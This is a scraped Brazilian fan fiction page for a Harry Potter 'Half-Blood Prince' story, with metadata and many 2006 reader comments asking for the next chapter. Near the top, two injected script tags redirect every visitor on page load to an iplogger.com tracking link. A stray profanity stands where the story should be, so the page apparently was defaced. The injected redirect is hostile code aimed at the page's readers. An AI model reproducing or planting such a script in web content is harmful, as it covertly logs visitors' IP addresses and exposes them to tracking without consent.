","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

Foda-se


Compartilhe!

anúncio

Comentários (2867)

  • Sua fic é muito boa , atualiza logo que já tá dificil de esperar pelo proximo cap.. Parabens pela forma de escrever!! Prende nossa atenção

    2006-06-08
  • Ola Sonia, tudo bem? Nossa essa sua FIC eh realmente excelente, varias vezes enquanto eu lia a sua FIC achava q tava lendo a propria JK Rowling escrevendo, vc eh uma super escritora adorei esse seu trabalho e espero q vc possa postar o ultimo capitulo o qto antes, pq to morrendo d vontade de ver como vai acabar. Alem disso eu tenho a impressao q o ultimo livro da Rowling nao sera tao bom qto a sua FIC, mas vamos ver oq acontece neh? um super bjo e agradeça a Deus pelo seu dom

    2006-06-08
  • sonia, estamos ansiosos pel35, é 35!!! =)

    2006-06-07
  • nao gostei desse capitulo nao!!! mas vc escreve bem sim

    2006-06-07
  • kd o 35 Posta logo rs Ps. A Fic ficou otima

    2006-06-07
  • parabens... a historia tah muuuuuuuuuuuuuuuuuuuuuito legal to adorando... to loka pra saber o q vai acobtecer... parebensssssss bjux

    2006-06-07
  • Oi, gente! Só pra frisar o que avisei por ocasião da atualização... Este NÃO foi o último capítulo! A fic ainda não terminou, ok? Suspendam temporariamente os berradores assassinos que estou recebendo! ; ) - Deixem para mandá-los se ou quando eu der ao Harry e à história um fim que não apreciem, ok? Adoro vocês, os comentários e agradeço todos os votos! Beijo grande! Fiquem bem!

    2006-06-07
  • Ai, Sônia, te devo mil desculpas. Deixei aquele comentário de alguém completamente fora de órbita e depois não a, pareci mais. Primeiro, eu levei algumas horas para meu coração voltar ao compasso... sim, porque tive taquicardia lendo o seu último capítulo. Acho que estupefata e emcantada é pouco para descrever o que eu li. Seu capítulo foi fantástico, perfeito, cheio de emoção e completamente envolvente. Adorei cada minuto dele. Da conversa entre Harry e Voldemort, ao fato do Rony matar a Nagini até a morte do Lord com os quatro cumprindo um papel importante. Absolutamente demais. Desculpe pelo brava, ficou por conta do fim (eu queria mais, buááá) e do seu recadinho que, admito, me deixou em pânico. Nossa, o que a Sônia ainda pretende fazer?? Ou seja, meu comentário anterior foi apenas a expressão de alguém com os nervos em frangalhos (por culpa sua). Minhas preces de fã são todas para que você não demore muito a atualizar e a gente possa ler logo o fim dessa sua saga maravilhosa (é só o que eu estou esperando para começar a reler a fic, hehe). Parabéns mil vezes! Beijo imenso. Cuide-se.

    2006-06-06
  • beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho! beijinho e votinho!

    2006-06-06
  • Sonia esse utimo cap fico mtu d+++++++...!!!!!!! mal possu espera pro otro!!!!!!; ) bjos

    2006-06-06
Você precisa estar logado para comentar. Faça Login.